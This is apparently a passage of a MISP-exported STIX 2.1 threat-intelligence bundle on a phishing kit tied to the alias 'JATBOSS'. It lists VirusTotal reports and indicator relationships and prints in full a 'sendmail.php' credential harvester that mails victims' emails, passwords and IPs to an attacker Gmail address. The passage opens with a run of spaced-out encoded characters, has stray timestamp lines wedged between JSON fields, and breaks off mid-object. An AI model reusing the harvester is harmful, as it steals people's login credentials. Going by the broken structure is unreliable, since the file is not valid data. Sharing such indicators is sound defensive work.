265 Q H g E / 4 J b R l F B 4 D z 3 j + q c e E 13 W 4 A v 9 o U C O u b 2 I N E y 9 o h p X 89 u b I J J S H G w H M 2 S o Z x 0 c S u j Y Y L c a / l k U O / j M p U 1 d q 2 T B T 7 N n z q b f 5 M H + S V Q d G + f k J l A P 0 b s T x B 93 I P R 4 Z P c 3 G J X j r O H b / W q C k z Z k A 5 o j 89 T R X 0 h I q J c C 1 b L U H c q H N f Y G T 4 q G E e o F V B o L T X q l G O L l 7 p x p 6 W z B J f H 62 T M v c Z j C F Y b z T E u I 7 C s p l 903 k g y y B j f / m x s 76 F 30 t r f e l w 4 X X J z u g C V Q z x o K s l 2 r s q 2 N d c m o A G T R p E + q u 0 X G N V 9 q G P 7 Q y c i p O 0 1 k O f m 4 J L e 6 X 8 H Q C u y j f G R r g C d 0e8 r j F v D p r D t W j x S R r C z 9 k 9 K x g S N s v P e q + 7 F F i o F B w R r s g 629 V G J s Q O G W 3 q L v W w Q f y a D T 3 D Q 6 T L m V m 8 D 19 Z 0 Q y 5 w 4 u 8 a L w k X R / T i e + 2 F O n W E W E l a q Z 7 C r F h / x Z R z d A 2 q / 0 x n j E K k 4 x 7 u 21 J v T 7 k x N b g p 8 Z v P d w R N Y O M 4 f i U Z H e k d 22 g z 7 a L l i K j Q h i s g J A V k / f y J K L J G 0 f U p Y J T I F T 8 B c Y u k H r I W b I Y C j 612 o n i 6 E B e e O Y D 8e1 a 6 V b + P J 1 d a A V y b + Y D U U s f A N 1 H G f L o L V q Y U d x q s D a y 7 Y E H P r L D 6 A K s s P E k 7 I C V R 4 S H u j V B j 7 B p Y b S 3 d t o e P Q N y J 9 t g w R 9 y f o q + W e p 1 U 5 G t 1 q V + G 5 h B f l Q Y X x k K b r p j I U f C g o l K W x s o e X C B 0 9 e K 67 e z 65 C / t s I t K p 0 k l Q 7 C Q e k / 2 x n 9 J r D U M f H 9 m p w 0 N a b 2 P b E 0 + G j i y f g v N N M I f R q f B M P 7 S / 3 N h K N 9 L 0 U W R l c G D E Z G B v B D x p p 6 J H C 0 d P S 4e4 P o j 5 z B 2 e r M k q I n 6 y c 8 z 9 O z L U E W Y 3 E D c R m x W g 2 z e s I + a x I e y k k o 1 K L + Z m c c 80 r A 6 u v r T Y y d n Z h x 7 L 0 8 D s U W M 2 a n u U + N C z 6 I V d S s 5 / 6 f 5 w d q j m y V 697 H W V I d 0 D y L m r a e i R c + F 7 N Z A 7 W 1 I D Y t s J A E l u n t J l h 6 / b M X H H t 3 o H B 3 w + x H t W o m A P j Z i h 1 P M 58 U Z f 4 h y g 9 Y n 2 y r F p 0 D X n L Q m e U B 9 O X b X / h Q z W Y r w t Z j d R Y J F m 1 n 1 j D w m K g o u w y R W / l X 7 k U a e f t a N e N L Q r p q d E S f u M q 5 C v Q n x N q P Y a 6 S j y E i T 8 I B l v F t 8 Q O y K u 2 E k 8 E P 81 y n a Y / N y P X + U N H 3 R m u d p p / f c G z 9 b J N U O 1 t x V u 47 N + A B p o 5 W G / 4 X o m 8 / X A 2 K w n X 3 e y l 8 L n u L W s e t 4 r l k L k X O e S y s Q D y 5 h g M G s 2 k r o J 3 d y u b P + Z l s K
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T13:52:15Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:43:45.000Z" ,
"modified" : "2019-05-16T13:43:45.000Z" ,
"labels" : [
"misp:name=\"person\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "role" ,
"value" : "Suspect" ,
"category" : "Other" ,
"uuid" : "5cdd6190-8d2c-4bc1-a932-4fd4950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "alias" ,
"value" : "JATBOSS" ,
"category" : "Other" ,
"uuid" : "5cdd6190-d518-4fb8-8401-450c950d210f"
} ,
{
"type" : "gender" ,
"object_relation" : "gender" ,
"value" : "Prefer not to say" ,
"category" : "Person" ,
"uuid" : "5cdd6190-bea0-4a00-b93f-4488950d210f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "person"
} ,
{
"type" : "malware" ,
"spec_version" : "2.1" ,
"id" : "malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:17:48.000Z" ,
"modified" : "2019-05-16T13:17:48.000Z" ,
"name" : "sendmail.php" ,
"is_family" : false ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "misc"
}
] ,
"implementation_languages" : [
"PHP"
] ,
"labels" : [
"misp:name=\"script\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_script" : "<?php\r\nif(isset($_SERVER['HTTP_X_REAL_IP'])){\r\n$ip = $_SERVER['HTTP_X_REAL_IP'];\r\n}else{\r\n$ip=$_SERVER['REMOTE_ADDR'];\r\n}\r\n$message .= \"|----------| E M A I L |--------------|\\n\";\r\n$message .= \"Online: \".$_POST['email'].\"\\n\";\r\n$message .= \"pass: \".$_POST['pwd'].\"\\n\";\r\n$message .= \"|--------------- I N F O | I P -------------------|\\n\";\r\n$message .= \"|Client IP: \".$ip.\"\\n\";\r\n$message .= \"|--- http://www.geoiptool.com/?IP=$ip ----\\n\";\r\n$message .= \"User Agent : \".$useragent.\"\\n\";\r\n$message .= \"|----------- HACKED BY JATBOSS --------------|\\n\";\r\n$send = \"jatboss6@gmail.com\";\r\n$subject = \"$country | $ip\";\r\n{\r\nmail(\"$send\", \"$subject\", $message); \r\n}\r\n\r\n\r\n?>" ,
"x_misp_state" : "Malicious"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--d9bdc42c-191f-49a2-8cbe-2604f5462df6" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:29:11.000Z" ,
"modified" : "2019-05-16T13:29:11.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-05-16T08:54:33" ,
"category" : "Other" ,
"uuid" : "f1c90675-0c32-40f1-af8f-f90a06993120"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/" ,
"category" : "Payload delivery" ,
"uuid" : "f8eb37d5-1ef7-4e7c-b97c-7fcab9d7e00e"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "1/56" ,
"category" : "Payload delivery" ,
"uuid" : "fb7fe45e-a16c-44c4-9a4b-7b6b0018fd43"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--dcd9ca51-3194-44ee-86a2-5f0cf9b923f8" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:29:11.000Z" ,
"modified" : "2019-05-16T13:29:11.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-05-13T02:37:30" ,
"category" : "Other" ,
"uuid" : "ac5c453a-e980-47a2-9a84-5d37cf392471"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/" ,
"category" : "Payload delivery" ,
"uuid" : "2b1914f7-d429-496f-b76b-dd9ea4ae34f2"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "0/58" ,
"category" : "Payload delivery" ,
"uuid" : "c092edd1-d209-4fc1-8b59-cc68ea535499"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--76f9b382-c58e-46f8-b174-42275f764d3e" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:29:11.000Z" ,
"modified" : "2019-05-16T13:29:11.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-05-13T02:37:43" ,
"category" : "Other" ,
"uuid" : "15b0df6f-7808-4a07-a743-33883c247a54"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/" ,
"category" : "Payload delivery" ,
"uuid" : "15db416c-93ca-4af3-bc7e-aa8af7ad332e"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "2/59" ,
"category" : "Payload delivery" ,
"uuid" : "0c2fc5a0-15f4-432a-90c6-c3a49b54266e"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--c22ccebe-e72f-4b92-9c63-a196b4959c43" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:29:12.000Z" ,
"modified" : "2019-05-16T13:29:12.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-05-15T17:45:13" ,
"category" : "Other" ,
"uuid" : "829ba8b8-a820-487f-9199-96b13a032e7b"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/" ,
"category" : "Payload delivery" ,
"uuid" : "77e038db-79c1-487f-8193-f857970cfd08"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "1/54" ,
"category" : "Payload delivery" ,
"uuid" : "17e94734-ed26-449a-b1fe-768b881c6f83"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--c3b36005-d35f-4540-bf78-cd09e2ac5e3d" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:29:12.000Z" ,
"modified" : "2019-05-16T13:29:12.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-05-16T09:42:04" ,
"category" : "Other" ,
"uuid" : "823fdaca-bb79-49fd-b865-e3e9d8dd86e3"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/" ,
"category" : "Payload delivery" ,
"uuid" : "3f1e2085-c793-4bb9-8022-5d037641c73e"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "10/61" ,
"category" : "Payload delivery" ,
"uuid" : "2c1f9f4d-f9bb-442e-84f8-0f06c1b28d5f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--f5647ba0-86e7-40fa-92a2-7d0fe024a7c2" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:29:12.000Z" ,
"modified" : "2019-05-16T13:29:12.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-05-15T20:41:35" ,
"category" : "Other" ,
"uuid" : "e2e51a40-0e8a-41df-a238-3176befa0d6d"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/" ,
"category" : "Payload delivery" ,
"uuid" : "2e637413-a76f-4b89-a5f1-1fb99c942c20"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "1/60" ,
"category" : "Payload delivery" ,
"uuid" : "a84ca298-e8e4-4048-becf-05c209cfaa19"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--9156df9c-4067-422e-bd38-8c3908e8ea5f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:29:12.000Z" ,
"modified" : "2019-05-16T13:29:12.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-05-13T02:37:29" ,
"category" : "Other" ,
"uuid" : "f1406b9a-3d0d-4419-96dc-6400f3a9bbb1"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/" ,
"category" : "Payload delivery" ,
"uuid" : "69ee832e-72d0-4b4b-a11c-f57e0452a076"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "0/58" ,
"category" : "Payload delivery" ,
"uuid" : "7d4b7e4e-98b2-4840-92ea-7f22911f5603"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--a1cc288d-984d-454c-bb8a-4f39eaabc9d9" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--97bd5034-12a0-4c06-a779-de38deac6059" ,
"target_ref" : "x-misp-object--76f9b382-c58e-46f8-b174-42275f764d3e"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--9e24ff82-461d-47c8-9a8d-632538aa9dc7" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--3a4f2299-8136-45ec-8927-223b672e4b88" ,
"target_ref" : "x-misp-object--dcd9ca51-3194-44ee-86a2-5f0cf9b923f8"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--75543602-135e-47b5-adeb-33617b83b44e" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--9608228e-4373-44ac-9fdd-bd37d5b02275" ,
"target_ref" : "x-misp-object--9156df9c-4067-422e-bd38-8c3908e8ea5f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--961af626-d91c-4abf-a0b5-96a19a591dc6" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "indicator--9608228e-4373-44ac-9fdd-bd37d5b02275" ,
"target_ref" : "x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--93a1b5cb-b3c4-41fe-872b-4baa08510b8f" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--9b01cb2b-b6f7-433f-a91d-7b572e8324bd" ,
"target_ref" : "x-misp-object--c22ccebe-e72f-4b92-9c63-a196b4959c43"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--456cb2c1-ca0b-4af8-bfd3-930e0613f289" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "indicator--9b01cb2b-b6f7-433f-a91d-7b572e8324bd" ,
"target_ref" : "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--1a96e906-2823-4077-9c49-0f488ce57dc7" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--06a84b03-0560-46ae-8570-1e7072a0b400" ,
"target_ref" : "x-misp-object--f5647ba0-86e7-40fa-92a2-7d0fe024a7c2"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--6310681b-0514-46b0-b9c0-60b29c6d28e2" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "indicator--06a84b03-0560-46ae-8570-1e7072a0b400" ,
"target_ref" : "x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--fb869c02-938e-4078-993e-6950c0959253" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--453258ef-0925-4471-9dcc-a06ab8038664" ,
"target_ref" : "x-misp-object--d9bdc42c-191f-49a2-8cbe-2604f5462df6"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--9a086825-5904-414d-b479-8205d53b8500" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "indicator--453258ef-0925-4471-9dcc-a06ab8038664" ,
"target_ref" : "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--1133d1e2-9a31-40e6-a67e-73d1afa18ba1" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--5cdd5ff1-ed58-46d3-bed7-4bae950d210f" ,
"target_ref" : "x-misp-object--c3b36005-d35f-4540-bf78-cd09e2ac5e3d"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--278afdc4-b54f-4032-ad42-ae6ec3def777" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "indicator--5cdd5ff1-ed58-46d3-bed7-4bae950d210f" ,
"target_ref" : "malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--f02bb64f-98de-49b8-80d6-8cb8adece1b7" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "owner-of" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "indicator--5cdd5b25-5624-4404-b507-c170950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--aacf8252-c017-41e9-b04d-401371530759" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "contained-within" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--54329dd6-b4f0-4a5b-aba2-487d71030419" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-ab44-4ab7-be4b-4aa1950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--0b158655-ad51-41fc-97c9-a4f4ed93aa85" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--1c74b5bd-88d2-46cc-83b5-30a6496e8870" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--80ff2b4f-c28a-46e2-b2f8-5bda12b221ff" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-713c-4eb6-adf5-4f3e950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--417112bc-55f4-48fd-b513-8eb02da31fbc" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-b678-4fae-bd00-4390950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--f8b93184-313e-4a81-95fa-bdd35ca3a44a" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-29ec-42c0-936b-4d9d950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--458035d0-ef31-4f17-9344-6bd8c7f28b58" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "abuses" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--3e2416c6-eacd-49aa-85ca-7e1536e9ab30" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "identity--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--df38c18d-288b-4f38-a75a-41cd5b6dafc4" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "owner-of" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "indicator--5cdd5b25-5624-4404-b507-c170950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--47244ea9-e1a1-4818-b73a-92839d4eff22" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "contained-within" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--d175e336-6135-4647-b29b-f801281360b4" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-ab44-4ab7-be4b-4aa1950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--d355ad79-2ac5-469e-99e1-948556d77f57" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--3258f81a-c783-4949-9818-8d2420910f0b" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--541a93ee-4485-4c63-b5a9-506dec849942" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-713c-4eb6-adf5-4f3e950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--ebb79458-35d6-4ba4-8c6f-abf797e8d83a" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
